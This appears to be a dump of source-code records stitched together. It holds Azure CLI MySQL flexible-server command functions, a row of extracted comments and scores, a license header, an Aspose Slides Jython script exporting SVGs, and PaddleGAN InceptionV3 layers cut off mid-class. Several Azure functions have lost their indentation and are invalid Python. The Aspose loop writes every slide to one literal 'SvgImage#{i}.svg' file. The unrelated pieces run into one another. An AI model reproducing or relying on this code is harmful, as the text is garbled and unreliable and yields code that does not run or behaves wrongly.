def server_delete_func(cmd, client, resource_group_name=None, server_name=None, yes=None):
    """Delete a flexible server, prompting for confirmation unless --yes was passed.

    Returns the delete poller on success, or None when the user declines.
    Raises CLIError when the service call fails.
    """
    result = None  # returned unchanged when the deletion is declined
    if yes:
        confirm = yes
    else:
        confirm = user_confirmation(
            "Are you sure you want to delete the server '{0}' in resource group '{1}'".format(server_name,
                                                                                              resource_group_name),
            yes=yes)
    if not confirm:
        return result
    try:
        result = client.begin_delete(resource_group_name, server_name)
        # Scrub cached server details from the local context so later commands
        # don't silently reuse a deleted server.
        if cmd.cli_ctx.local_context.is_on:
            context_file = cmd.cli_ctx.local_context._get_local_context_file()  # pylint: disable=protected-access
            for option in ('server_name', 'administrator_login', 'database_name'):
                context_file.remove_option('mysql flexible-server', option)
    except Exception as ex:  # pylint: disable=broad-except
        logger.error(ex)
        raise CLIError(ex)
    return result
# Parameter update command
def flexible_parameter_update(client, server_name, configuration_name, resource_group_name, source=None, value=None):
    """Update one server configuration parameter.

    When neither a value nor a source is supplied, the parameter is reset to
    its system default. A value without an explicit source is treated as a
    user override.
    """
    if value is None and source is None:
        # Reset path: look up the parameter's default from the service.
        try:
            current = client.get(resource_group_name, server_name, configuration_name)
            value = current.default_value  # reset value to default
            source = "system-default"
        except CloudError as e:
            raise CLIError('Unable to get default parameter value: {}.'.format(str(e)))
    elif source is None:
        source = "user-override"

    config = mysql_flexibleservers.models.Configuration(name=configuration_name,
                                                        value=value,
                                                        source=source)
    return client.begin_update(resource_group_name, server_name, configuration_name, config)
# Replica commands
# Custom functions for server replica, will add PostgreSQL part after backend ready in future
def flexible_replica_create(cmd, client, resource_group_name, replica_name, server_name, no_wait=False, location=None, sku_name=None, tier=None, **kwargs):
    """Create a read replica of an existing MySQL flexible server.

    Accepts the source server either as a bare name (resolved within the
    given resource group) or as a full ARM resource id. The replica always
    inherits location and SKU from the source server.
    """
    provider = 'Microsoft.DBforMySQL'

    # Normalize the source server reference into a full ARM resource id.
    if not is_valid_resource_id(server_name):
        if len(server_name.split('/')) != 1:
            raise CLIError('The provided source-server {} is invalid.'.format(server_name))
        server_name = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
                                  resource_group=resource_group_name,
                                  namespace=provider,
                                  type='flexibleServers',
                                  name=server_name)

    id_parts = parse_resource_id(server_name)
    try:
        source_server = client.get(id_parts['resource_group'], id_parts['name'])
    except CloudError as e:
        raise CLIError('Unable to get source server: {}.'.format(str(e)))

    # location/sku/tier parameters are intentionally overridden by the source
    # server's values: a replica must match its source.
    parameters = mysql_flexibleservers.models.Server(
        sku=mysql_flexibleservers.models.Sku(name=source_server.sku.name,
                                             tier=source_server.sku.tier),
        source_server_id=server_name,
        location=source_server.location,
        create_mode="Replica")

    return sdk_no_wait(no_wait, client.begin_create, resource_group_name, replica_name, parameters)
def flexible_replica_stop(client, resource_group_name, server_name):
    """Stop replication: promote a replica into a standalone server.

    Raises CLIError when the server cannot be fetched or is not a replica.
    """
    try:
        server = client.get(resource_group_name, server_name)
    except Exception as e:
        raise CLIError('Unable to get server: {}.'.format(str(e)))

    role = server.replication_role
    if role is not None and role.lower() != "replica":
        raise CLIError('Server {} is not a replica server.'.format(server_name))

    # Resolve ServerForUpdate from the same SDK module the server object came
    # from, so the update model always matches the API version in use.
    from importlib import import_module
    ServerForUpdate = getattr(import_module(server.__module__), 'ServerForUpdate')
    return client.begin_update(resource_group_name, server_name,
                               ServerForUpdate(replication_role='None'))
def flexible_server_mysql_get(cmd, resource_group_name, server_name):
    """Fetch a single MySQL flexible server resource."""
    mgmt_client = get_mysql_flexible_management_client(cmd.cli_ctx)
    return mgmt_client.servers.get(resource_group_name, server_name)
def flexible_list_skus(cmd, client, location):
    """List available SKUs/capabilities for the given Azure location."""
    skus = client.list(location)
    logger.warning('For prices please refer to https://aka.ms/mysql-pricing')
    return skus
def _create_server(db_context, cmd, resource_group_name, server_name, location, backup_retention, sku_name, tier,
                   storage_mb, administrator_login, administrator_login_password, version, tags,
                   delegated_subnet_arguments,
                   assign_identity, public_network_access, ha_enabled, availability_zone, iops):
    """Create the MySQL flexible server resource and wait for completion.

    Returns the created server resource (via resolve_poller); propagates any
    SDK/poller exception on failure.
    """
    logging_name, server_client = db_context.logging_name, db_context.server_client
    logger.warning('Creating %s Server \'%s\' in group \'%s\'...', logging_name, server_name, resource_group_name)

    logger.warning('Your server \'%s\' is using sku \'%s\' (Paid Tier). '
                   'Please refer to https://aka.ms/mysql-pricing for pricing details', server_name, sku_name)

    # Note : passing public-network-access has no effect as the accepted values are 'Enabled' and 'Disabled'.
    # So when you pass an IP here(from the CLI args of public_access), it ends up being ignored.
    parameters = mysql_flexibleservers.models.Server(
        sku=mysql_flexibleservers.models.Sku(name=sku_name, tier=tier),
        administrator_login=administrator_login,
        # BUG FIX: this keyword previously carried the placeholder token
        # '<PASSWORD>' (a redaction artifact), which is not valid Python and
        # dropped the actual credential — forward the real argument.
        administrator_login_password=administrator_login_password,
        version=version,
        public_network_access=public_network_access,
        storage_profile=mysql_flexibleservers.models.StorageProfile(
            backup_retention_days=backup_retention,
            storage_mb=storage_mb,
            storage_iops=iops),
        location=location,
        create_mode="Default",
        delegated_subnet_arguments=delegated_subnet_arguments,
        ha_enabled=ha_enabled,
        availability_zone=availability_zone,
        tags=tags)

    if assign_identity:
        parameters.identity = mysql_flexibleservers.models.Identity()

    return resolve_poller(
        server_client.begin_create(resource_group_name, server_name, parameters), cmd.cli_ctx,
        '{} Server Create'.format(logging_name))
def flexible_server_connection_string(
        server_name='{server}', database_name='{database}', administrator_login='{login}',
        administrator_login_password='{password}'):
    """Return sample connection strings for common MySQL clients.

    Unspecified arguments stay as '{placeholder}' tokens so the user can see
    where to substitute their own values.
    """
    if database_name is None:
        database_name = 'mysql'  # server's built-in default database
    host = '{}.mysql.database.azure.com'.format(server_name)
    strings = _create_mysql_connection_strings(host, administrator_login, administrator_login_password,
                                               database_name)
    return {'connectionStrings': strings}
def _create_mysql_connection_strings(host, user, password, database):
result = {
'mysql_cmd': "mysql {database} --host {host} --user {user} --password={password}",
'ado.net': "Server={host}; Port=3306; Database={database}; Uid={user}; Pwd={password};",
'jdbc': "jdbc:mysql://{host}:3306/{database}?user={user}&password={password}",
'jdbc Spring': "spring.datasource.url=jdbc:mysql://{host}:3306/{database} "
"spring.datasource.username={user} "
"spring.datasource.password={password}",
'node.js': "var conn = mysql.createConnection({{host: '{host}', user: '{user}', "
"password: {password}, database: {database}, port: 3306}});",
'php': "host={host} port=3306 dbname={database} user={user} password={password}",
'python': "cnx = mysql.connector.connect(user='{user}', password='{password}', host='{host}', "
"port=3306, database='{database}')",
'ruby': "client = Mysql2::Client.new(username: '{user}', password: '{password}', "
"database: '{database}', host: '{host}', port: 3306)",
}
connection_kwargs = {
'host': host,
'user': user,
'password': password if password is not None else '{password}',
'database': database
}
for k, v in result.items():
result[k] = v.format(**connection_kwargs)
return result
def _form_response(username, sku, location, server_id, host, version, password, connection_string, database_name,
firewall_id=None, subnet_id=None):
output = {
'host': host,
'username': username,
'password': password,
'skuname': sku,
'location': location,
'id': server_id,
'version': version,
'databaseName': database_name,
'connectionString': connection_string
}
if firewall_id is not None:
output['firewallName'] = firewall_id
if subnet_id is not None:
output['subnetId'] = subnet_id
return output
def _update_local_contexts(cmd, server_name, resource_group_name, location, user):
    """Persist frequently reused values into the CLI local context (no-op when disabled)."""
    local_context = cmd.cli_ctx.local_context
    if not local_context.is_on:
        return
    # Server-specific values are scoped to the mysql flexible-server group;
    # location/resource group are shared across all command groups.
    local_context.set(['mysql flexible-server'], 'server_name', server_name)
    local_context.set([ALL], 'location', location)
    local_context.set([ALL], 'resource_group_name', resource_group_name)
    local_context.set(['mysql flexible-server'], 'administrator_login', user)
def _create_database(db_context, cmd, resource_group_name, server_name, database_name):
    """Create the database with utf8 defaults unless it already exists."""
    cf_db, logging_name = db_context.cf_db, db_context.logging_name
    database_client = cf_db(cmd.cli_ctx, None)
    try:
        # Probe for an existing database; success means nothing to do.
        database_client.get(resource_group_name, server_name, database_name)
    except ResourceNotFoundError:
        logger.warning('Creating %s database \'%s\'...', logging_name, database_name)
        parameters = {'name': database_name,
                      'charset': 'utf8',
                      'collation': 'utf8_general_ci'}
        resolve_poller(
            database_client.begin_create_or_update(resource_group_name, server_name, database_name, parameters), cmd.cli_ctx,
            '{} Database Create/Update'.format(logging_name))
def database_create_func(client, resource_group_name=None, server_name=None, database_name=None, charset=None, collation=None):
    """Create/update a database.

    Defaults to utf8/utf8_general_ci when neither charset nor collation is
    supplied; supplying only one of the two is an error.
    """
    if charset is None and collation is None:
        charset, collation = 'utf8', 'utf8_general_ci'
        logger.warning("Creating database with utf8 charset and utf8_general_ci collation")
    elif bool(charset) != bool(collation):
        # Exactly one of the pair was provided.
        raise RequiredArgumentMissingError("charset and collation have to be input together.")

    parameters = {'name': database_name,
                  'charset': charset,
                  'collation': collation}
    return client.begin_create_or_update(resource_group_name, server_name,
                                         database_name, parameters)
def _create_mysql_connection_string(host, database_name, user_name, password):
connection_kwargs = {
'host': host,
'dbname': database_name,
'username': user_name,
'password': password if password is not None else '{password}'
}
return 'mysql {dbname} --host {host} --user {username} --password={password}'.format(**connection_kwargs)
def _determine_iops(storage_gb, iops_info, iops, tier, sku_name):
default_iops = 100
max_supported_iops = iops_info[tier][sku_name]
free_storage_iops = storage_gb * 3
if iops is None:
return default_iops
if iops < default_iops:
if iops <= free_storage_iops:
iops = max(default_iops, min(max_supported_iops, free_storage_iops))
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with free %s IOPS...', iops)
elif iops > free_storage_iops:
iops = default_iops
logger.warning('The min IOPS is %s. Provisioning the server with %s...', iops, iops)
elif iops > max_supported_iops:
iops = max_supported_iops
logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s IOPS...', iops, iops)
elif default_iops <= iops <= free_storage_iops:
iops = min(free_storage_iops, max_supported_iops)
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with %s free IOPS...', iops)
return iops
# pylint: disable=too-many-instance-attributes, too-few-public-methods, useless-object-inheritance
class DbContext(object):
    """Bundle of per-database-flavor collaborators handed between the create/update helpers."""

    def __init__(self, azure_sdk=None, logging_name=None, cf_firewall=None, cf_db=None,
                 command_group=None, server_client=None):
        # Each collaborator is stored under its parameter name.
        self.azure_sdk = azure_sdk
        self.logging_name = logging_name
        self.command_group = command_group
        self.server_client = server_client
        self.cf_firewall = cf_firewall
        self.cf_db = cf_db
|
en
| 0.616691
|
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- # pylint: disable=unused-argument, line-too-long # pylint: disable=import-error # region create without args # pylint: disable=too-many-locals, too-many-statements # validator # Raise error when user passes values for both parameters # When address space parameters are passed, the only valid combination is : --vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix # pylint: disable=too-many-boolean-expressions # Populate desired parameters # Handle Vnet scenario # calculate IOPS # storage input comes in GiB value # Create mysql server # Note : passing public_access has no effect as the accepted values are 'Enabled' and 'Disabled'. So the value ends up being ignored. # Adding firewall rule # Create mysql database if it does not exist # Retrieve location from same location as source server # pylint: disable=too-many-branches # validator # replacement not needed for update in flex servers # Downgrading SKU # Upgrading SKU # pylint: disable=too-many-boolean-expressions # Downgrading # Upgrading # if disabled is pass in reset to default values # set values - if maintenance_window when is None when created then create a new object # default return value # pylint: disable=protected-access # pylint: disable=broad-except # Parameter update command # update the command with system default # reset value to default # Replica commands # Custom functions for server replica, will add PostgreSQL part after backend ready in future # set source server id # replacement not needed for update in flex servers # Note : passing public-network-access has no effect as the accepted values are 'Enabled' and 'Disabled'. 
# So when you pass an IP here(from the CLI args of public_access), it ends up being ignored. # Setting the server name in the local context # Setting the location in the local context # Setting the server name in the local context # check for existing database, create if not # pylint: disable=too-many-instance-attributes, too-few-public-methods, useless-object-inheritance
| 1.682834
| 2
|
nfv/nfv-plugins/nfv_plugins/nfvi_plugins/clients/__init__.py
|
SidneyAn/nfv
| 2
|
6628124
|
<filename>nfv/nfv-plugins/nfv_plugins/nfvi_plugins/clients/__init__.py
#
# Copyright (c) 2018 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
|
<filename>nfv/nfv-plugins/nfv_plugins/nfvi_plugins/clients/__init__.py
#
# Copyright (c) 2018 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
|
en
| 0.450774
|
# # Copyright (c) 2018 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 #
| 1.102799
| 1
|
Plugins/Aspose-Slides-Java-for-Jython/asposeslides/WorkingWithSlidesInPresentation/CreatingSvg.py
|
Aspose/Aspose.Slides-for-Java
| 1
|
6628125
|
from asposeslides import Settings
from com.aspose.slides import Presentation
from com.aspose.slides import SaveFormat
from java.io import FileOutputStream
class CreatingSvg:
def __init__(self):
dataDir = Settings.dataDir + 'WorkingWithSlidesInPresentation/CreatingSvg/'
## Instantiate Presentation class that represents the presentation file
pres = Presentation(dataDir + 'demo.pptx')
# Getting last slide index
last_slide_position = pres.getSlides().size()
#Iterating through every presentation slide and generating SVG image
i = 0
while i < last_slide_position:
# Accessing Slides
slide = pres.getSlides().get_Item(i)
# Getting and saving the slide SVG image
slide.writeAsSvg(FileOutputStream(dataDir + "SvgImage#{i}.svg"))
i+=1
print "Created SVG images, please check output files."
if __name__ == '__main__':
CreatingSvg()
|
from asposeslides import Settings
from com.aspose.slides import Presentation
from com.aspose.slides import SaveFormat
from java.io import FileOutputStream
class CreatingSvg:
def __init__(self):
dataDir = Settings.dataDir + 'WorkingWithSlidesInPresentation/CreatingSvg/'
## Instantiate Presentation class that represents the presentation file
pres = Presentation(dataDir + 'demo.pptx')
# Getting last slide index
last_slide_position = pres.getSlides().size()
#Iterating through every presentation slide and generating SVG image
i = 0
while i < last_slide_position:
# Accessing Slides
slide = pres.getSlides().get_Item(i)
# Getting and saving the slide SVG image
slide.writeAsSvg(FileOutputStream(dataDir + "SvgImage#{i}.svg"))
i+=1
print "Created SVG images, please check output files."
if __name__ == '__main__':
CreatingSvg()
|
en
| 0.777831
|
## Instantiate Presentation class that represents the presentation file # Getting last slide index #Iterating through every presentation slide and generating SVG image # Accessing Slides # Getting and saving the slide SVG image #{i}.svg"))
| 3.078543
| 3
|
ppgan/metrics/inception.py
|
lyl120117/PaddleGAN
| 6,852
|
6628126
|
#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import math
import paddle
import paddle.nn as nn
from paddle.nn import Conv2D, AvgPool2D, MaxPool2D, BatchNorm, Linear, AdaptiveAvgPool2D
__all__ = ['InceptionV3']
class InceptionV3(nn.Layer):
    """InceptionV3 trunk that returns intermediate features at chosen block indices.

    Blocks 0..3 end, respectively, at the first max-pool (64ch), second
    max-pool (192ch), pre-aux-classifier stage (768ch) and final average
    pool (2048ch). Only the blocks up to the largest requested index are built.
    """

    DEFAULT_BLOCK_INDEX = 3
    # Map output channel dimensionality -> block index.
    BLOCK_INDEX_BY_DIM = {
        64: 0,  # First max pooling features
        192: 1,  # Second max pooling featurs
        768: 2,  # Pre-aux classifier features
        2048: 3  # Final average pooling features
    }

    def __init__(self,
                 output_blocks=[DEFAULT_BLOCK_INDEX],
                 class_dim=1000,
                 aux_logits=False,
                 resize_input=True,
                 normalize_input=True):
        super(InceptionV3, self).__init__()
        self.resize_input = resize_input
        self.normalize_input = normalize_input
        self.output_blocks = sorted(output_blocks)
        self.last_needed_block = max(output_blocks)
        self.class_dim = class_dim
        self.aux_logits = aux_logits
        assert self.last_needed_block <= 3, 'Last possible output block index is 3'
        self.blocks = []

        # Block 0: stem convolutions plus the first max-pool.
        self.Conv2d_1a_3x3 = ConvBNLayer(3, 32, 3, stride=2, name='Conv2d_1a_3x3')
        self.Conv2d_2a_3x3 = ConvBNLayer(32, 32, 3, name='Conv2d_2a_3x3')
        self.Conv2d_2b_3x3 = ConvBNLayer(32, 64, 3, padding=1, name='Conv2d_2b_3x3')
        self.maxpool1 = MaxPool2D(kernel_size=3, stride=2)
        self.blocks.append(nn.Sequential(self.Conv2d_1a_3x3, self.Conv2d_2a_3x3,
                                         self.Conv2d_2b_3x3, self.maxpool1))

        # Block 1: 1x1/3x3 convolutions plus the second max-pool.
        if self.last_needed_block >= 1:
            self.Conv2d_3b_1x1 = ConvBNLayer(64, 80, 1, name='Conv2d_3b_1x1')
            self.Conv2d_4a_3x3 = ConvBNLayer(80, 192, 3, name='Conv2d_4a_3x3')
            self.maxpool2 = MaxPool2D(kernel_size=3, stride=2)
            self.blocks.append(nn.Sequential(self.Conv2d_3b_1x1,
                                             self.Conv2d_4a_3x3, self.maxpool2))

        # Block 2: Mixed_5b/5c/5d followed by Mixed_6a..6e.
        if self.last_needed_block >= 2:
            self.Mixed_5b = Fid_inceptionA(192, pool_features=32, name='Mixed_5b')
            self.Mixed_5c = Fid_inceptionA(256, pool_features=64, name='Mixed_5c')
            self.Mixed_5d = Fid_inceptionA(288, pool_features=64, name='Mixed_5d')
            self.Mixed_6a = InceptionB(288, name='Mixed_6a')
            self.Mixed_6b = Fid_inceptionC(768, c7=128, name='Mixed_6b')
            self.Mixed_6c = Fid_inceptionC(768, c7=160, name='Mixed_6c')
            self.Mixed_6d = Fid_inceptionC(768, c7=160, name='Mixed_6d')
            self.Mixed_6e = Fid_inceptionC(768, c7=192, name='Mixed_6e')
            self.blocks.append(nn.Sequential(
                self.Mixed_5b, self.Mixed_5c, self.Mixed_5d, self.Mixed_6a,
                self.Mixed_6b, self.Mixed_6c, self.Mixed_6d, self.Mixed_6e))

        # NOTE: as in the original, the aux head is created whenever
        # aux_logits is set, independent of last_needed_block.
        if self.aux_logits:
            self.AuxLogits = InceptionAux(768, self.class_dim, name='AuxLogits')

        # Block 3: Mixed_7a/7b/7c plus the global average pool.
        if self.last_needed_block >= 3:
            self.Mixed_7a = InceptionD(768, name='Mixed_7a')
            self.Mixed_7b = Fid_inceptionE_1(1280, name='Mixed_7b')
            self.Mixed_7c = Fid_inceptionE_2(2048, name='Mixed_7c')
            self.avgpool = AdaptiveAvgPool2D(output_size=1)
            self.blocks.append(nn.Sequential(self.Mixed_7a, self.Mixed_7b,
                                             self.Mixed_7c, self.avgpool))

    def forward(self, x):
        """Return (features, aux): features at the requested block indices, aux logits or None."""
        outputs = []
        aux = None
        if self.resize_input:
            # Inception expects 299x299 inputs.
            x = nn.functional.interpolate(x,
                                          size=[299, 299],
                                          mode='bilinear',
                                          align_corners=False,
                                          align_mode=0)
        if self.normalize_input:
            # Rescale to [-1, 1] — assumes inputs in [0, 1]; TODO confirm at call sites.
            x = x * 2 - 1
        for idx, block in enumerate(self.blocks):
            x = block(x)
            if self.aux_logits and idx == 2:
                aux = self.AuxLogits(x)
            if idx in self.output_blocks:
                outputs.append(x)
            if idx == self.last_needed_block:
                break
        return outputs, aux
class InceptionA(nn.Layer):
    """Inception-A block: 1x1, 5x5, double-3x3 and avg-pool branches concatenated on channels."""

    def __init__(self, in_channels, pool_features, name=None):
        super(InceptionA, self).__init__()
        self.branch1x1 = ConvBNLayer(in_channels, 64, 1, name=name + '.branch1x1')
        self.branch5x5_1 = ConvBNLayer(in_channels, 48, 1, name=name + '.branch5x5_1')
        self.branch5x5_2 = ConvBNLayer(48, 64, 5, padding=2, name=name + '.branch5x5_2')
        self.branch3x3dbl_1 = ConvBNLayer(in_channels, 64, 1, name=name + '.branch3x3dbl_1')
        self.branch3x3dbl_2 = ConvBNLayer(64, 96, 3, padding=1, name=name + '.branch3x3dbl_2')
        self.branch3x3dbl_3 = ConvBNLayer(96, 96, 3, padding=1, name=name + '.branch3x3dbl_3')
        self.branch_pool0 = AvgPool2D(kernel_size=3, stride=1, padding=1, exclusive=True)
        self.branch_pool = ConvBNLayer(in_channels, pool_features, 1, name=name + '.branch_pool')

    def forward(self, x):
        out_1x1 = self.branch1x1(x)
        out_5x5 = self.branch5x5_2(self.branch5x5_1(x))
        out_3x3dbl = self.branch3x3dbl_3(self.branch3x3dbl_2(self.branch3x3dbl_1(x)))
        out_pool = self.branch_pool(self.branch_pool0(x))
        # Join branch outputs along the channel axis.
        return paddle.concat([out_1x1, out_5x5, out_3x3dbl, out_pool], axis=1)
class InceptionB(nn.Layer):
    """Inception-B reduction block: stride-2 3x3, double-3x3 and max-pool branches."""

    def __init__(self, in_channels, name=None):
        super(InceptionB, self).__init__()
        self.branch3x3 = ConvBNLayer(in_channels, 384, 3, stride=2, name=name + '.branch3x3')
        self.branch3x3dbl_1 = ConvBNLayer(in_channels, 64, 1, name=name + '.branch3x3dbl_1')
        self.branch3x3dbl_2 = ConvBNLayer(64, 96, 3, padding=1, name=name + '.branch3x3dbl_2')
        self.branch3x3dbl_3 = ConvBNLayer(96, 96, 3, stride=2, name=name + '.branch3x3dbl_3')
        self.branch_pool = MaxPool2D(kernel_size=3, stride=2)

    def forward(self, x):
        out_3x3 = self.branch3x3(x)
        out_3x3dbl = self.branch3x3dbl_3(self.branch3x3dbl_2(self.branch3x3dbl_1(x)))
        out_pool = self.branch_pool(x)
        return paddle.concat([out_3x3, out_3x3dbl, out_pool], axis=1)
class InceptionC(nn.Layer):
    """Inception-C block: 1x1, factorized 7x7, double factorized 7x7 and pool branches."""

    def __init__(self, in_channels, c7, name=None):
        super(InceptionC, self).__init__()
        self.branch1x1 = ConvBNLayer(in_channels, 192, 1, name=name + '.branch1x1')
        self.branch7x7_1 = ConvBNLayer(in_channels, c7, 1, name=name + '.branch7x7_1')
        self.branch7x7_2 = ConvBNLayer(c7, c7, (1, 7), padding=(0, 3), name=name + '.branch7x7_2')
        self.branch7x7_3 = ConvBNLayer(c7, 192, (7, 1), padding=(3, 0), name=name + '.branch7x7_3')
        self.branch7x7dbl_1 = ConvBNLayer(in_channels, c7, 1, name=name + '.branch7x7dbl_1')
        self.branch7x7dbl_2 = ConvBNLayer(c7, c7, (7, 1), padding=(3, 0), name=name + '.branch7x7dbl_2')
        self.branch7x7dbl_3 = ConvBNLayer(c7, c7, (1, 7), padding=(0, 3), name=name + '.branch7x7dbl_3')
        self.branch7x7dbl_4 = ConvBNLayer(c7, c7, (7, 1), padding=(3, 0), name=name + '.branch7x7dbl_4')
        self.branch7x7dbl_5 = ConvBNLayer(c7, 192, (1, 7), padding=(0, 3), name=name + '.branch7x7dbl_5')
        self.branch_pool0 = AvgPool2D(kernel_size=3, stride=1, padding=1, exclusive=True)
        self.branch_pool = ConvBNLayer(in_channels, 192, 1, name=name + '.branch_pool')

    def forward(self, x):
        out_1x1 = self.branch1x1(x)
        out_7x7 = self.branch7x7_3(self.branch7x7_2(self.branch7x7_1(x)))
        out_7x7dbl = self.branch7x7dbl_1(x)
        for layer in (self.branch7x7dbl_2, self.branch7x7dbl_3,
                      self.branch7x7dbl_4, self.branch7x7dbl_5):
            out_7x7dbl = layer(out_7x7dbl)
        out_pool = self.branch_pool(self.branch_pool0(x))
        return paddle.concat([out_1x1, out_7x7, out_7x7dbl, out_pool], axis=1)
class InceptionD(nn.Layer):
    """Inception-D reduction block: stride-2 3x3, 7x7-then-3x3 and max-pool branches."""

    def __init__(self, in_channels, name=None):
        super(InceptionD, self).__init__()
        self.branch3x3_1 = ConvBNLayer(in_channels, 192, 1, name=name + '.branch3x3_1')
        self.branch3x3_2 = ConvBNLayer(192, 320, 3, stride=2, name=name + '.branch3x3_2')
        self.branch7x7x3_1 = ConvBNLayer(in_channels, 192, 1, name=name + '.branch7x7x3_1')
        self.branch7x7x3_2 = ConvBNLayer(192, 192, (1, 7), padding=(0, 3), name=name + '.branch7x7x3_2')
        self.branch7x7x3_3 = ConvBNLayer(192, 192, (7, 1), padding=(3, 0), name=name + '.branch7x7x3_3')
        self.branch7x7x3_4 = ConvBNLayer(192, 192, 3, stride=2, name=name + '.branch7x7x3_4')
        self.branch_pool = MaxPool2D(kernel_size=3, stride=2)

    def forward(self, x):
        out_3x3 = self.branch3x3_2(self.branch3x3_1(x))
        out_7x7x3 = x
        for layer in (self.branch7x7x3_1, self.branch7x7x3_2,
                      self.branch7x7x3_3, self.branch7x7x3_4):
            out_7x7x3 = layer(out_7x7x3)
        out_pool = self.branch_pool(x)
        return paddle.concat([out_3x3, out_7x7x3, out_pool], axis=1)
class InceptionE(nn.Layer):
    """Inception-E block: branches split into (1x3)/(3x1) pairs that are concatenated per branch."""

    def __init__(self, in_channels, name=None):
        super(InceptionE, self).__init__()
        self.branch1x1 = ConvBNLayer(in_channels, 320, 1, name=name + '.branch1x1')
        self.branch3x3_1 = ConvBNLayer(in_channels, 384, 1, name=name + '.branch3x3_1')
        self.branch3x3_2a = ConvBNLayer(384, 384, (1, 3), padding=(0, 1), name=name + '.branch3x3_2a')
        self.branch3x3_2b = ConvBNLayer(384, 384, (3, 1), padding=(1, 0), name=name + '.branch3x3_2b')
        self.branch3x3dbl_1 = ConvBNLayer(in_channels, 448, 1, name=name + '.branch3x3dbl_1')
        self.branch3x3dbl_2 = ConvBNLayer(448, 384, 3, padding=1, name=name + '.branch3x3dbl_2')
        self.branch3x3dbl_3a = ConvBNLayer(384, 384, (1, 3), padding=(0, 1), name=name + '.branch3x3dbl_3a')
        self.branch3x3dbl_3b = ConvBNLayer(384, 384, (3, 1), padding=(1, 0), name=name + '.branch3x3dbl_3b')
        self.branch_pool0 = AvgPool2D(kernel_size=3, stride=1, padding=1, exclusive=True)
        self.branch_pool = ConvBNLayer(in_channels, 192, 1, name=name + '.branch_pool')

    def forward(self, x):
        out_1x1 = self.branch1x1(x)
        stem_3x3 = self.branch3x3_1(x)
        out_3x3 = paddle.concat([self.branch3x3_2a(stem_3x3),
                                 self.branch3x3_2b(stem_3x3)], axis=1)
        stem_dbl = self.branch3x3dbl_2(self.branch3x3dbl_1(x))
        out_3x3dbl = paddle.concat([self.branch3x3dbl_3a(stem_dbl),
                                    self.branch3x3dbl_3b(stem_dbl)], axis=1)
        out_pool = self.branch_pool(self.branch_pool0(x))
        return paddle.concat([out_1x1, out_3x3, out_3x3dbl, out_pool], axis=1)
class InceptionAux(nn.Layer):
    """Auxiliary classifier head producing num_classes logits."""

    def __init__(self, in_channels, num_classes, name=None):
        super(InceptionAux, self).__init__()
        self.num_classes = num_classes
        self.pool0 = AvgPool2D(kernel_size=5, stride=3)
        self.conv0 = ConvBNLayer(in_channels, 128, 1, name=name + '.conv0')
        self.conv1 = ConvBNLayer(128, 768, 5, name=name + '.conv1')
        self.pool1 = AvgPool2D(global_pooling=True)

    def forward(self, x):
        x = self.conv1(self.conv0(self.pool0(x)))
        x = self.pool1(x)
        # NOTE(review): paddle.flatten/paddle.static.nn.fc usage kept verbatim —
        # mixing static fc into a dynamic Layer looks suspect; confirm upstream.
        x = paddle.flatten(x, axis=1)
        x = paddle.static.nn.fc(x, size=self.num_classes)
        return x
class Fid_inceptionA(nn.Layer):
    """FID variant of the Inception-A block (1x1, 5x5, double-3x3, avg-pool branches)."""

    def __init__(self, in_channels, pool_features, name=None):
        super(Fid_inceptionA, self).__init__()
        self.branch1x1 = ConvBNLayer(in_channels, 64, 1, name=name + '.branch1x1')
        self.branch5x5_1 = ConvBNLayer(in_channels, 48, 1, name=name + '.branch5x5_1')
        self.branch5x5_2 = ConvBNLayer(48, 64, 5, padding=2, name=name + '.branch5x5_2')
        self.branch3x3dbl_1 = ConvBNLayer(in_channels, 64, 1, name=name + '.branch3x3dbl_1')
        self.branch3x3dbl_2 = ConvBNLayer(64, 96, 3, padding=1, name=name + '.branch3x3dbl_2')
        self.branch3x3dbl_3 = ConvBNLayer(96, 96, 3, padding=1, name=name + '.branch3x3dbl_3')
        self.branch_pool0 = AvgPool2D(kernel_size=3, stride=1, padding=1, exclusive=True)
        self.branch_pool = ConvBNLayer(in_channels, pool_features, 1, name=name + '.branch_pool')

    def forward(self, x):
        out_1x1 = self.branch1x1(x)
        out_5x5 = self.branch5x5_2(self.branch5x5_1(x))
        out_3x3dbl = self.branch3x3dbl_3(self.branch3x3dbl_2(self.branch3x3dbl_1(x)))
        out_pool = self.branch_pool(self.branch_pool0(x))
        return paddle.concat([out_1x1, out_5x5, out_3x3dbl, out_pool], axis=1)
class Fid_inceptionC(nn.Layer):
    """FID variant of the Inception-C block (1x1, factorized 7x7, double 7x7, pool branches)."""

    def __init__(self, in_channels, c7, name=None):
        super(Fid_inceptionC, self).__init__()
        self.branch1x1 = ConvBNLayer(in_channels, 192, 1, name=name + '.branch1x1')
        self.branch7x7_1 = ConvBNLayer(in_channels, c7, 1, name=name + '.branch7x7_1')
        self.branch7x7_2 = ConvBNLayer(c7, c7, (1, 7), padding=(0, 3), name=name + '.branch7x7_2')
        self.branch7x7_3 = ConvBNLayer(c7, 192, (7, 1), padding=(3, 0), name=name + '.branch7x7_3')
        self.branch7x7dbl_1 = ConvBNLayer(in_channels, c7, 1, name=name + '.branch7x7dbl_1')
        self.branch7x7dbl_2 = ConvBNLayer(c7, c7, (7, 1), padding=(3, 0), name=name + '.branch7x7dbl_2')
        self.branch7x7dbl_3 = ConvBNLayer(c7, c7, (1, 7), padding=(0, 3), name=name + '.branch7x7dbl_3')
        self.branch7x7dbl_4 = ConvBNLayer(c7, c7, (7, 1), padding=(3, 0), name=name + '.branch7x7dbl_4')
